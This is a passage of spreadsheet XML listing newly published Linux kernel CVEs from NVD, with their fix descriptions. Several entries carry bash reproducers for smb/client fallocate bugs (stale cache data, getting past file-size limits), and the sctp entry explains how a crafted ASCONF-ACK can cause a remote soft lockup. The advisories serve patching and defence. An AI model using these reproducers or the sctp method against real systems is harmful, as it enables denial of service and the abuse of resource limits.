      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q732" s="5" t="inlineStr"/>
      <c r="R732" s="5" t="inlineStr"/>
      <c r="S732" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: rate limit unmapped SID errors
A client can include many structurally valid but unmapped SIDs in a DACL.
Logging every mapping failure lets one request generate hundreds of kernel
error messages.
Rate limit the message to prevent an authenticated client from flooding
the kernel log.</t>
        </is>
      </c>
      <c r="T732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98113</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98114</t>
        </is>
      </c>
      <c r="D733" s="5" t="inlineStr"/>
      <c r="E733" s="5" t="inlineStr"/>
      <c r="F733" s="5" t="inlineStr"/>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q733" s="5" t="inlineStr"/>
      <c r="R733" s="5" t="inlineStr"/>
      <c r="S733" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: propagate DACL parsing errors
parse_dacl() silently accepts truncated ACEs and allocation failures,
allowing set_info_sec() to continue with an incomplete ACL conversion.
Return parsing and allocation errors to parse_sec_desc() so malformed
security descriptors are rejected before inode attributes or ACL xattrs
are updated.</t>
        </is>
      </c>
      <c r="T733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98114</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98117</t>
        </is>
      </c>
      <c r="D734" s="5" t="inlineStr"/>
      <c r="E734" s="5" t="inlineStr"/>
      <c r="F734" s="5" t="inlineStr"/>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr"/>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr"/>
      <c r="L734" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q734" s="5" t="inlineStr"/>
      <c r="R734" s="5" t="inlineStr"/>
      <c r="S734" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cachefiles: Fix potential UAF/KASAN warning
Currently, trace_cachefiles_coherency() is being passed a pointer to a
__be64 lain over the coherency data in struct cachefiles_xattr so that it
can display the first 8 bytes.  However, the data is of variable length and
could even be 0 bytes.  This could lead to a UAF or KASAN warning.
Fix this by making sure the buffer has room for at least 8 bytes and that
those 8 bytes are pre-cleared.
Further, those bytes are not 8-byte aligned, so fix the tracepoint to
extract the data as four 2-byte words (they are 2-byte aligned) and
reassemble the __be64.  The compiler will convert this into a single 8-byte
load where the CPU supports it.</t>
        </is>
      </c>
      <c r="T734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98117</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98118</t>
        </is>
      </c>
      <c r="D735" s="5" t="inlineStr"/>
      <c r="E735" s="5" t="inlineStr"/>
      <c r="F735" s="5" t="inlineStr"/>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr"/>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr"/>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q735" s="5" t="inlineStr"/>
      <c r="R735" s="5" t="inlineStr"/>
      <c r="S735" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfs: Fix readahead synchronisation issues by loading all folios upfront
There are some synchronisation issues that derive from the app thread
adding more folios to the rolling buffer whilst the collector thread is
looking at them or trying to clear them, such as determining the setting of
front_folio_order when the next folio hasn't been added yet,
The reason for the rolling buffer approach is that loading the buffer
upfront and then dropping all the refs just acquired is quite a slow
operation, and loading progressively allows some of the cost to be deferred
until after at least some of the I/O is started.
Instead, a better way is to load all the folios into the rolling buffer
upfront - and then drop the refs later, once the I/O is in progress.  (Even
better would be for the refs not to be there at all.)
Fix this by changing the rolling buffer loader to load all the folios
selected by the VM for readahead upfront into the folio queue.  The folio
queue is allocated a batch worth at a time as we don't know how many folios
are involved (the readahead_control struct, alas, has a page count, not a
folio count).
The folio refs acquired from readahead are then dropped in bulk once the
first subrequest is dispatched as it's quite a slow operation.  The
collector waits for NETFS_RREQ_NEED_PUT_RA_REFS to be cleared so that it
doesn't unlock folios before the xarray has been scanned for them.
This simplifies the buffer handling later and isn't noticeably slower as
the xarray doesn't need to be modified and the folios are all already
pre-locked.</t>
        </is>
      </c>
      <c r="T735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98118</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98119</t>
        </is>
      </c>
      <c r="D736" s="5" t="inlineStr"/>
      <c r="E736" s="5" t="inlineStr"/>
      <c r="F736" s="5" t="inlineStr"/>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr"/>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q736" s="5" t="inlineStr"/>
      <c r="R736" s="5" t="inlineStr"/>
      <c r="S736" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfs: break unbuffered write when netfs_alloc_subrequest() fails
syzbot reported a null-ptr-deref below [1] following a fault injection in
netfs_alloc_subrequest(). [0]
When netfs_alloc_subrequest() fails, subreq is NULL.
Later, netfs_prepare_write() tries to initialize members of
subreq(e.g., source), the issue in [1] is triggered.
Let's handle the error of netfs_prepare_write() properly.
[0]
FAULT_INJECTION: forcing a failure.
name failslab, interval 1, probability 0, space 0, times 0
Call Trace:
 netfs_alloc_subrequest+0x116/0x3f0
 netfs_prepare_write+0x76/0x7b0
 netfs_unbuffered_write+0x75c/0x2020
 netfs_unbuffered_write_iter_locked+0x7d6/0xa80
 netfs_unbuffered_write_iter+0x442/0x720
 v9fs_file_write_iter+0xbf/0x100
 vfs_write+0x6ac/0x1050
[1]
KASAN: null-ptr-deref in range [0x00000000000000a8-0x00000000000000af]
RIP: 0010:netfs_prepare_write+0xbc/0x7b0 fs/netfs/write_issue.c:173
Call Trace:
 netfs_unbuffered_write+0x75c/0x2020 fs/netfs/direct_write.c:111
 netfs_unbuffered_write_iter_locked+0x7d6/0xa80 fs/netfs/direct_write.c:290
 netfs_unbuffered_write_iter+0x442/0x720 fs/netfs/direct_write.c:382
 v9fs_file_write_iter+0xbf/0x100 fs/9p/vfs_file.c:409
 new_sync_write fs/read_write.c:595 [inline]</t>
        </is>
      </c>
      <c r="T736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98119</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98120</t>
        </is>
      </c>
      <c r="D737" s="5" t="inlineStr"/>
      <c r="E737" s="5" t="inlineStr"/>
      <c r="F737" s="5" t="inlineStr"/>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="inlineStr"/>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr"/>
      <c r="L737" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q737" s="5" t="inlineStr"/>
      <c r="R737" s="5" t="inlineStr"/>
      <c r="S737" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfs: Fix subreq ref leak
Fix a subrequest ref leak in netfs_unbuffered_write() in the event that
subreq-&gt;io_iter ends up zero length during preparation.</t>
        </is>
      </c>
      <c r="T737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98120</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98121</t>
        </is>
      </c>
      <c r="D738" s="5" t="inlineStr"/>
      <c r="E738" s="5" t="inlineStr"/>
      <c r="F738" s="5" t="inlineStr"/>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr"/>
      <c r="L738" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q738" s="5" t="inlineStr"/>
      <c r="R738" s="5" t="inlineStr"/>
      <c r="S738" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
watchdog: msc313e: Fix NULL pointer dereference in PM callbacks
msc313e_wdt_probe() doesn't set the driver data for the platform device.
As a result, dev_get_drvdata() in msc313e_wdt_suspend() and
msc313e_wdt_resume() will return NULL, leading to a NULL pointer
dereference afterward.
Set the platform device driver data in msc313e_wdt_probe().</t>
        </is>
      </c>
      <c r="T738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98121</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98123</t>
        </is>
      </c>
      <c r="D739" s="5" t="inlineStr"/>
      <c r="E739" s="5" t="inlineStr"/>
      <c r="F739" s="5" t="inlineStr"/>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q739" s="5" t="inlineStr"/>
      <c r="R739" s="5" t="inlineStr"/>
      <c r="S739" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: fix soft lockup from unpadded ASCONF-ACK parameter iteration
sctp_verify_asconf() walks ASCONF-ACK parameters with
sctp_walk_params(), which advances by SCTP_PAD4(length), while the
consumer sctp_get_asconf_response() iterates the same parameters
advancing by the raw length, without padding. A single odd-length
parameter desynchronises the two walks and makes the consumer
interpret attacker-controlled bytes at a misaligned offset.
When those bytes yield a length of zero, the while loop over
asconf_ack_len makes no progress, spinning forever in softirq
context, and the watchdog reports a soft lockup. All reads stay
within the received skb, so the lockup is a pure remote denial of
service. A remote peer can trigger it with a crafted ASCONF-ACK on
an ADD-IP enabled association with an outstanding ASCONF (RFC 5061
section 4.1.2 requires the chunk to be authenticated, but the
predefined empty key id 0 allows the peer to compute the same
association HMAC from publicly exchanged parameters, so the gate
does not help).
The SCTP_PARAM_ERR_CAUSE case of sctp_verify_asconf() also performs
no length check, letting a parameter without a complete error
header reach the consumer, which reads errhdr.cause past the end of
the parameter, an out-of-bounds read.
Reject SCTP_PARAM_ERR_CAUSE parameters shorter than
sizeof(struct sctp_addip_param) + sizeof(struct sctp_errhdr) at the
verifier, and advance the consumer iterator with the same padding
rule as the verifier to keep the two walks in lockstep. The verifier
change guarantees a complete error header in every ERR_CAUSE
parameter the consumer can see, so the consumer's asconf_ack_len
check is dropped and it returns err_param-&gt;cause directly. The
consumer padding fix is still required because odd lengths remain
valid for SCTP_PARAM_ERR_CAUSE per RFC 5061.
The issue was found by ZeroHive, a vulnerability hunting agent at
Tencent Yunding Lab.</t>
        </is>
      </c>
      <c r="T739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98123</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98124</t>
        </is>
      </c>
      <c r="D740" s="5" t="inlineStr"/>
      <c r="E740" s="5" t="inlineStr"/>
      <c r="F740" s="5" t="inlineStr"/>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="inlineStr"/>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q740" s="5" t="inlineStr"/>
      <c r="R740" s="5" t="inlineStr"/>
      <c r="S740" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/client: invalidate fscache for fallocate range operations
smb3_zero_range(), smb3_punch_hole(), smb3_insert_range(), and
smb3_collapse_range() modify file contents through server-side range
operations. These operations discard the affected page cache, but leave
the FS-Cache cookie valid, so a later read may return data cached before
the range operation.
Fix this by invalidating FS-Cache after outstanding I/O has completed
and before modifying the file on the server.
Run the following as root on a CIFS mount with fsc enabled and an active
CacheFiles backend:
        bash -c '
                MNT=/mnt/cifs
                FILE="$MNT/repro"
                # Generate four 1 MiB random blocks: [A][B][C][D].
                dd if=/dev/urandom of=/tmp/src bs=1M count=4 status=none
                # Expected contents after zeroing B: [A][zero][C][D].
                cp /tmp/src /tmp/expected
                dd if=/dev/zero of=/tmp/expected bs=1M seek=1 count=1 \
                        conv=notrunc status=none
                cp /tmp/src "$FILE"
                # Populate FS-Cache, then discard the page cache.
                sync
                echo 1 &gt; /proc/sys/vm/drop_caches
                cat "$FILE" &gt; /dev/null
                sync
                echo 1 &gt; /proc/sys/vm/drop_caches
                fallocate --zero-range -o 1M -l 1M "$FILE"
                if cmp -s /tmp/expected "$FILE"; then
                        echo "readback: OK"
                else
                        echo "readback: STALE DATA"
                fi
        '
Before this change, the readback differs from /tmp/expected:
        readback: STALE DATA
After this change, it matches:
        readback: OK</t>
        </is>
      </c>
      <c r="T740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98124</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98125</t>
        </is>
      </c>
      <c r="D741" s="5" t="inlineStr"/>
      <c r="E741" s="5" t="inlineStr"/>
      <c r="F741" s="5" t="inlineStr"/>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="inlineStr"/>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K741" s="5" t="inlineStr"/>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q741" s="5" t="inlineStr"/>
      <c r="R741" s="5" t="inlineStr"/>
      <c r="S741" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/client: fix stale page cache in insert/collapse range
smb3_insert_range() and smb3_collapse_range() use
truncate_pagecache_range() to invalidate the affected page cache.
However, if off or old_eof is not page-aligned, the boundary pages are
only partially zeroed and remain uptodate. As a result, the client may
return stale data after a successful insert/collapse range operation.
For example, with 4K pages:
    page 0          page 1          page 2
    0------4K       4K------8K      8K------12K
       ^                                ^
    off=2K                       old_eof=10K
Page 1 is removed from the page cache, while the boundary pages are
only partially zeroed. After COPYCHUNK moves the data on the server,
these cached pages may still return stale data.
This can be reproduced on a CIFS mount:
    bash -c '
            FILE=/mnt/scratch/repro
            # Use a 6 KiB file so EOF is not page-aligned.
            dd if=/dev/urandom of=/tmp/src bs=1K count=6 status=none
            # Expected: a 4 KiB hole followed by the original data.
            rm -f /tmp/expected
            truncate -s 4K /tmp/expected
            cat /tmp/src &gt;&gt; /tmp/expected
            cp /tmp/src "$FILE"
            # Prime the page cache before moving data on the server.
            cat "$FILE" &gt; /dev/null
            fallocate --insert-range -o 0 -l 4K "$FILE"
            if cmp -s /tmp/expected "$FILE"; then
                    echo "readback: OK"
            else
                    echo "readback: STALE DATA"
            fi
    '
Fix this by writing back dirty data and discarding the page cache from
the start of the page containing off to EOF before moving data on the
server.</t>
        </is>
      </c>
      <c r="T741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98125</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98126</t>
        </is>
      </c>
      <c r="D742" s="5" t="inlineStr"/>
      <c r="E742" s="5" t="inlineStr"/>
      <c r="F742" s="5" t="inlineStr"/>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="inlineStr"/>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr"/>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q742" s="5" t="inlineStr"/>
      <c r="R742" s="5" t="inlineStr"/>
      <c r="S742" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/client: validate new EOF for zero range
When FALLOC_FL_ZERO_RANGE is used without FALLOC_FL_KEEP_SIZE,
smb3_zero_range() may extend EOF without checking RLIMIT_FSIZE, allowing
the file to grow beyond the caller's file-size limit.
Fix this by calling inode_newsize_ok() before sending the zero-range
request when the operation would extend EOF.
Reproducer, using a file on a CIFS mount:
	bash -c '
	        FILE=/mnt/cifs/repro
	        trap "" SIGXFSZ
	        ulimit -f 3072
	        truncate -s 2M "$FILE"
	        fallocate --zero-range -o 0 -l 4M "$FILE"
	        echo "fallocate rc=$?"
	        stat -c "file size=%s" "$FILE"
	'
Before this change, the operation succeeds despite the 3 MiB limit:
	fallocate rc=0
	file size=4194304
After this change, fallocate fails and leaves the file at 2 MiB.</t>
        </is>
      </c>
      <c r="T742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98126</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98127</t>
        </is>
      </c>
      <c r="D743" s="5" t="inlineStr"/>
      <c r="E743" s="5" t="inlineStr"/>
      <c r="F743" s="5" t="inlineStr"/>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="inlineStr"/>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr"/>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q743" s="5" t="inlineStr"/>
      <c r="R743" s="5" t="inlineStr"/>
      <c r="S743" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/client: validate new EOF for insert range
smb3_insert_range() does not check if the new file size
(i_size + len) is valid. This allows FALLOC_FL_INSERT_RANGE to bypass
RLIMIT_FSIZE, exceed s_maxbytes, or produce a size outside the loff_t
range.
Use check_add_overflow() to calculate the new EOF. Validate it with
inode_newsize_ok() before modifying the file.
Reproducer, using a file on a CIFS mount:
	bash -c '
		FILE=/mnt/cifs/repro
		trap "" SIGXFSZ
		ulimit -f 3072		# RLIMIT_FSIZE = 3 MiB
		# A regular write is stopped at 3 MiB.
		dd if=/dev/zero of="$FILE" bs=1M count=4 status=none
		stat -c "size after write: %s" "$FILE"
		# Insert 2 MiB into a 2 MiB file.
		truncate -s 2M "$FILE"
		fallocate -i -o 0 -l 2M "$FILE"
		stat -c "size after insert: %s" "$FILE"
	'
Before this change, the regular write stops at the 3 MiB limit, but
insert range grows the file to 4 MiB:
	dd: error writing '/mnt/cifs/repro': File too large
	size after write: 3145728
	size after insert: 4194304
After this change, insert range also fails at the limit and leaves the
2 MiB file unchanged:
	dd: error writing '/mnt/cifs/repro': File too large
	size after write: 3145728
	fallocate: fallocate failed: File too large
	size after insert: 2097152</t>
        </is>
      </c>
      <c r="T743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98127</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98128</t>
        </is>
      </c>
      <c r="D744" s="5" t="inlineStr"/>
      <c r="E744" s="5" t="inlineStr"/>
      <c r="F744" s="5" t="inlineStr"/>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="inlineStr"/>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K744" s="5" t="inlineStr"/>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q744" s="5" t="inlineStr"/>
      <c r="R744" s="5" t="inlineStr"/>
      <c r="S744" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: mpi3mr: Fix target device refcount leak in mpi3mr_sas_port_add()
mpi3mr_get_tgtdev_by_addr() increments the target device kref when it
returns a device. If a subsequent error triggers a goto out_fail after
the tgtdev reference is acquired, the reference is never released
because the out_fail path does not call mpi3mr_tgtdev_put(). This
prevents the target device structure from ever being freed.
Add a tgtdev put in the out_fail path, guarded by a NULL check since
tgtdev is only acquired for SAS_END_DEVICE types and the same cleanup
path is shared by earlier error cases where tgtdev is still NULL.</t>
        </is>
      </c>
      <c r="T744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98128</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98129</t>
        </is>
      </c>
      <c r="D745" s="5" t="inlineStr"/>
      <c r="E745" s="5" t="inlineStr"/>
      <c r="F745" s="5" t="inlineStr"/>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="inlineStr"/>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr"/>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q745" s="5" t="inlineStr"/>
      <c r="R745" s="5" t="inlineStr"/>
      <c r="S745" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: mpi3mr: Fix NULL pointer dereference in mpi3mr_sas_port_add()
sas_port_alloc_num() can return NULL on memory allocation failure. The
return value is passed directly to sas_port_add() without a NULL check,
which causes a NULL pointer dereference.
